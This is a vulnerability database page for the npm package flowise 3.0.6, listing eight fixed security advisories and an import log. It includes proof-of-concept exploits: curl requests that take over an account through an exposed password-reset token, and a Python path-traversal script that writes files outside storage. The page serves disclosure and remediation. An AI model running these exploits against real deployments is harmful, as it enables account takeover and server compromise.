Package details: pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
Vulnerabilities affecting this package (0)
Vulnerability Summary Fixed by
This package is not known to be affected by vulnerabilities.
Vulnerabilities fixed by this package (8)
Vulnerability Summary Aliases
VCID-2wkq-5agr-6bgz: Flowise has Remote Code Execution vulnerability
Aliases: CVE-2025-59528, GHSA-3gcm-f6qx-ff7p

The CustomMCP node allows users to input configuration settings for connecting to an external MCP (Model Context Protocol) server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs.
VCID-5vb2-73xr-97cw: Duplicate Advisory: FlowiseAI Pre-Auth Arbitrary Code Execution
Aliases: GHSA-3g4j-r53p-22wx

### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-7944-7c6r-55vv. This link is maintained to preserve external references.

### Original Description
Flowise through v3.0.4 is vulnerable to remote code execution via unsanitized evaluation of user input in the "Supabase RPC Filter" field.
VCID-8sv7-ezxh-eyhq: Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover
Aliases: CVE-2025-58434, GHSA-wgpv-6j63-x5ph

### Summary
The `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**.

This vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API.

**CVSS v3.1 Base Score:** **9.8 (Critical)**
**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`

---

### Details
* The endpoint `/api/v1/account/forgot-password` accepts an email address as input.
* Instead of only sending a reset email, the API **responds directly with sensitive user details**, including:
  * User ID, name, email, hashed credential, status, timestamps.
  * **A valid `tempToken` and its expiry**, which is intended for password reset.
* This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction.
* Exploitation requires only the victim’s email address, which is often guessable or discoverable.
* Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email.

---

### PoC
1. **Request a reset token for the victim**

```bash
curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'
```

**Response (201 Created):**

```json
{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
```

2. **Use the exposed `tempToken` to reset the password**

```bash
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
    "user":{
      "email":"<victim@example.com>",
      "tempToken":"<redacted-tempToken>",
      "password":"NewSecurePassword123!"
    }
  }'
```

**Expected Result:** `200 OK`
The victim’s account password is reset, allowing full login.

---

### Impact
* **Type:** Authentication bypass / Insecure direct object exposure.
* **Impact:**
  * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
  * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**.
  * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
  * High likelihood of exploitation since no prior access or user interaction is required.

---

### Recommended Remediation
* **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
* Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.
* Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
* Apply the same fixes to **both cloud and self-hosted/local deployments**.
* Log and monitor password reset requests for suspicious activity.
* Consider multi-factor verification for sensitive accounts.

Credit

---

⚠️ This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**.
VCID-8wyy-ep3u-xkh5: Flowise has an Arbitrary File Read
Aliases: GHSA-99pg-hqvx-r4gf

An arbitrary file read vulnerability in the `chatId` parameter supplied to both the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints allows unauthenticated users to read unintended files on the local filesystem. In the default Flowise configuration this allows reading of the local sqlite db and subsequent compromise of all database content.
VCID-gjgw-sjnh-zkhr: Duplicate
Aliases: CVE-2025-59527, GHSA-hr92-4q35-4j3m

This advisory duplicates another.
VCID-prvx-mjqx-fuew: Flowise has arbitrary file access due to missing chat flow id validation
Aliases: GHSA-q67q-549q-p849

### Summary
Missing chat flow id validation allows an attacker to access arbitrary file.

### Details
Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.

**Case 1**

When creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.

```typescript
export const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {
    // ...
    } else {
        const dir = path.join(getStoragePath(), chatflowid) // path traversal here
        if (!fs.existsSync(dir)) {
            fs.mkdirSync(dir, { recursive: true })
        }

        const splitDataURI = fileBase64.split(',')
        const filename = splitDataURI.pop()?.split(':')[1] ?? ''
        const bf = Buffer.from(splitDataURI.pop() || '', 'base64')
        const sanitizedFilename = _sanitizeFilename(filename)

        const filePath = path.join(dir, sanitizedFilename)
        fs.writeFileSync(filePath, bf)
        fileNames.push(sanitizedFilename)
        return 'FILE-STORAGE::' + JSON.stringify(fileNames)
    }
}
```

**Case 2**

When downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path. Note that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.

### PoC
Launch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.

```python
import requests
import json

url = "http://localhost:8080/api/v1/chatflows"
headers = {"x-request-from": "internal"}

nodedata = {
    "category": "Document Loaders",
    "inputs": {
        "key": "data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn"
    }
}
flownode = {
    "id": "a",
    "data": nodedata
}
flowdata = {
    "nodes": [flownode],
    "edges": [],
    "viewport": {"x": 1, "y": 1, "zoom": 1}
}
data = {
    "id": "../../../../../tmp",
    "name": "name",
    "flowData": json.dumps(flowdata)
}

res = requests.post(url, json=data, headers=headers)
```

### Impact
1. Arbitrary file read / write
2. Remote Code Execution
3. Data loss
VCID-rhdz-rcy5-y3a6: Duplicate
Aliases: CVE-2025-57164, GHSA-7944-7c6r-55vv

This advisory duplicates another.
VCID-zmed-seae-ebfe: Flowise has unsandboxed remote code execution via Custom MCP
Aliases: GHSA-6933-jpx5-q87q

The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the `FLOWISE_USERNAME` and `FLOWISE_PASSWORD` environment variables. This combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-06-04T17:08:33.291107+00:00 GithubOSV Importer Fixing VCID-8wyy-ep3u-xkh5 https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-99pg-hqvx-r4gf/GHSA-99pg-hqvx-r4gf.json 38.6.0
2026-06-04T17:08:32.005735+00:00 GithubOSV Importer Fixing VCID-rhdz-rcy5-y3a6 https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-7944-7c6r-55vv/GHSA-7944-7c6r-55vv.json 38.6.0
2026-06-04T17:08:31.691546+00:00 GithubOSV Importer Fixing VCID-8sv7-ezxh-eyhq https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-wgpv-6j63-x5ph/GHSA-wgpv-6j63-x5ph.json 38.6.0
2026-06-04T17:08:28.356099+00:00 GithubOSV Importer Fixing VCID-prvx-mjqx-fuew https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-q67q-549q-p849/GHSA-q67q-549q-p849.json 38.6.0
2026-06-04T17:08:21.704850+00:00 GithubOSV Importer Fixing VCID-zmed-seae-ebfe https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-6933-jpx5-q87q/GHSA-6933-jpx5-q87q.json 38.6.0
2026-06-04T17:08:09.846140+00:00 GithubOSV Importer Fixing VCID-gjgw-sjnh-zkhr https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-hr92-4q35-4j3m/GHSA-hr92-4q35-4j3m.json 38.6.0
2026-06-04T17:07:52.999083+00:00 GithubOSV Importer Fixing VCID-2wkq-5agr-6bgz https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-3gcm-f6qx-ff7p/GHSA-3gcm-f6qx-ff7p.json 38.6.0
2026-06-04T17:05:40.603112+00:00 GithubOSV Importer Fixing VCID-5vb2-73xr-97cw https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-3g4j-r53p-22wx/GHSA-3g4j-r53p-22wx.json 38.6.0
2026-06-02T04:48:11.361087+00:00 GitLab Importer Fixing VCID-5vb2-73xr-97cw https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-3g4j-r53p-22wx.yml 38.6.0
2026-06-02T04:47:43.650329+00:00 GitLab Importer Fixing VCID-rhdz-rcy5-y3a6 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2025-57164.yml 38.6.0
2026-06-02T04:47:42.776903+00:00 GitLab Importer Fixing VCID-gjgw-sjnh-zkhr https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2025-59527.yml 38.6.0
2026-06-02T04:47:42.406498+00:00 GitLab Importer Fixing VCID-zmed-seae-ebfe https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-6933-jpx5-q87q.yml 38.6.0
2026-06-02T04:47:41.935221+00:00 GitLab Importer Fixing VCID-8wyy-ep3u-xkh5 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/GHSA-99pg-hqvx-r4gf.yml 38.6.0
2026-06-02T04:47:41.507271+00:00 GitLab Importer Fixing VCID-2wkq-5agr-6bgz https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/flowise/CVE-2025-59528.yml 38.6.0